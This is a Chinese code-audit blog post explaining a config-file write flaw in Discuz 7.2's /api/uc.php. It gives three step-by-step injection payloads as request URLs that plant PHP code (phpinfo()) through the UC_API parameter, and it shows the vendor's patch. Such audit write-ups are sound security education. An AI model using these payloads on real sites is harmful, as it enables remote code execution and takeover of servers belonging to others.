美文网首页PHP开发网络安全实验室
[代码审计]-PHP配置文件写漏洞

[代码审计]-PHP配置文件写漏洞

作者: 晴空歌 | 来源:发表于2017-07-16 21:27 被阅读160次

问题

阿里云安骑士报discuz 7.2版本的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏。

漏洞代码

function updateapps($get, $post) {
    ......
    #行360
    $configfile = trim(file_get_contents($this->appdir.'./config.inc.php'));
    $configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;

     //将POST收到子系统的uc_api写入配置文件,
    //对接收的参数增加addslashes避免直接输入[' | "] 闭包前面的符号,造成写任意代码
    $configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i",
                    "define('UC_API', '".addslashes($UC_API)."');", $configfile);

    if($fp = @fopen($this->appdir.'./config.inc.php', 'w')) {
        @fwrite($fp, trim($configfile));
        @fclose($fp);
    }
    ......
}

最开始处理这个漏洞时,只是照着网上的方案修复了一下,未求甚解。直到最近看了P神的博客,突然茅塞顿开。照葫芦画瓢写下这个漏洞的利用方法。

后话:最好的修复方式应该是:与最新版系统对比不同。
此外,当有开源系统发布新版时,也可以通过查看diff高效的发现旧旧版本安全漏洞。

漏洞利用

假设对方已经获取了你的UC_KEY,可以使用Dz自带的_authcode方法发送任意的请求。将漏洞代码简化如下:

#读取配置,用请求参数中的UC_API替换文件内容,回写到文件中
$file = file_get_contents('./config.php');

$UC_API = $_REQUEST['uc_api'];
$file = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '".addslashes($UC_API)."');", $file);

file_put_contents('./config.php', $file);

法1 (利用正则 .*? 的非贪婪匹配 )

#第一步:插入',并用//注释后面的代码
http://localhost/safe/conf_test.php?uc_api=aaa');phpinfo();//
#config.php : 此时配置正常
      define('UC_API', 'aaa\');phpinfo();//');

#第二步:uc_api=任意内容,利用正则将两个['aaa\']中的内容提换掉
http://localhost/safe/conf_test.php?uc_api=ccb
#confing.php:  掺入phpinfo 代码可执行
      define('UC_API', 'ccb');phpinfo();//');

OR,使用 %0a将代码折行注释

#第一步:插入',并折行注释后续代码
http://localhost/safe/conf_test.php?uc_api=aaa');phpinfo();%0a//
#config.php : 
      # define('UC_API', 'aaa\');phpinfo();
      # //');

#第二步同上

法2 (利用preg_replace 第二个参数,自动转义反斜线 '' )

preg_replace.png

正则替换的第二个参数会自动进行转义,将两个连续的\\,转义为一个\。 所以如果存在 {\\\'} 则会被转义为{\\'},最后多出来一个{'}

#访问:
 http://localhost/safe/conf_test.php?uc_api=aaa\');phpinfo();//
#config.php : 成功插入可执行代码
      define('UC_API', 'aaa\\'); phpinfo(); //');

法3(利用正则\n|$n,将第n个子组替换到文本中)

#正则替换子组功能示例
$a = 'aa1234aa';
$b = preg_replace('/aa(\d+)aa/', 'bb\1bb', $a);
echo $b;
//输出: bb1234bb。 详细说明见上图preg_replace.png

%00 代表字符串Null,有各种文件相关的截断漏洞。 但addslashes( urldecode(%00) ) = '\0'。
在正则中'\0' 正好表示完整模式的匹配文本,可以用来利用。

#第一步:
http://localhost/safe/conf_test.php?uc_api=aaa);phpinfo();//
#config.php : 
      define('UC_API', 'aaa);phpinfo();//');

#第二步:uc_api=%00
#confing.php:  
       define('UC_API', '【define('UC_API', 'aaa\');】');phpinfo();//');

#第三步:
# todo,这个使用define来配置变量,在此处用%00这个方法不是很好实现漏洞利用,构造合规语法需要多次尝试。

下面套用一个简单的例子:

<?php 
#conf_set.php  
#配置文件使用 $option='xxx'; 形式来配置,覆盖语法一样
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|',"\$option='$str';",$file);
file_put_contents('xxxxx/option.php',$file);
?>

漏洞复现:

#第一次传入:;phpinfo();
     #文件内容:$option=';phpinfo();';

#第二次传入:%00
     #%00被addslashes()转为\0,而\0在preg_replace函数中会被替换为“匹配到的全部内容”,
     #此时preg_replace要执行的代码如下:
     preg_replace('|\$option=\'.*\';|',"\$option='\0';",$file);
     
     #文件内容: $option='\$option=';  phpinfo(); ';';   

#成功闭合

漏洞修复

官网修复方案:

//1. 先过滤掉POST参数中的特殊字符
if($post['UC_API']) {
    $UC_API = str_replace(array('\'', '"', '\\', "\0", "\n", "\r"), '', $post['UC_API']);
    unset($post['UC_API']);
        }

......
//2. 写入文件前判断UC_API是否为url格式
if(preg_match('/^https?:\/\//is', $UC_API)) {
    $configfile = trim(file_get_contents($this->appdir.'./config.inc.php'));
    $configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;
    
    $configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", 
                 "define('UC_API', '".addslashes($UC_API)."');", $configfile);
    
    if($fp = @fopen($this->appdir.'./config.inc.php', 'w')) {
        @fwrite($fp, trim($configfile));
        @fclose($fp);
    }
}

相关阅读:

相关文章

  • [代码审计]-PHP配置文件写漏洞

    问题 阿里云安骑士报discuz 7.2版本的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取u...

  • 2019-07-28-php代码审计

    一、PHP代码执行代码审计首先讲一下PHP代码执行漏洞和命令执行漏洞的区别,PHP代码执行指的是将php代码植入到...

  • 最全的PHP反序列化漏洞的理解和应用

    php反序列化漏洞,又叫php对象注入漏洞,是一种常见的漏洞,在我们进行代码审计以及CTF中经常能够遇到。 01学...

  • 攻防世界(进阶)--WEB--8.Web_php_unseria

    考察点:php代码审计 1.进入场景,得到php代码 2.化简代码,审计 3.写脚本 得到参数:TzorNDoiR...

  • PHP 漏洞与代码审计

    作者:lanz 博客链接:http://netsecurity.51cto.com/art/201303/3862...

  • 攻防世界-Web-unserialize3

    题目信息: 打开题目环境,得到php代码 审计代码,就是让我们运用__wakeup()函数的漏洞拿flag的。这里...

  • 代码审计

    代码审计工具 1、三款自动化代码审计工具教程2、seay源代码审计系统 PHP核心配置详解 注意PHP各个版本中配...

  • 【代码审计】PHP代码审计

    1. 概述 代码审核,是对应用程序源代码进行系统性检查的工作。它的目的是为了找到并且修复应用程序在开发阶段存在的一...

  • 2021-12-06-java代码审计初步认知

    一、代码审计的定义代码审计是一种以发现安全漏洞,程序错误和程序违规为目标的源代码分析技能。 二、代码审计需要的能力...

  • Php代码审计

    Challenge show_source(__FILE__); $flag="xxxx"; if(isset($...

网友评论

本文标题:[代码审计]-PHP配置文件写漏洞

本文链接:https://www.haomeiwen.com/subject/ucfvcxtx.html

延伸阅读

深度阅读

  • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

栏目导航

热点阅读

PHP开发

网络安全实验室

关于我们|服务条款|联系我们|[代码审计]-PHP配置文件写漏洞|投稿指南|网站地图|RSS订阅|排版工具|手机版

提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!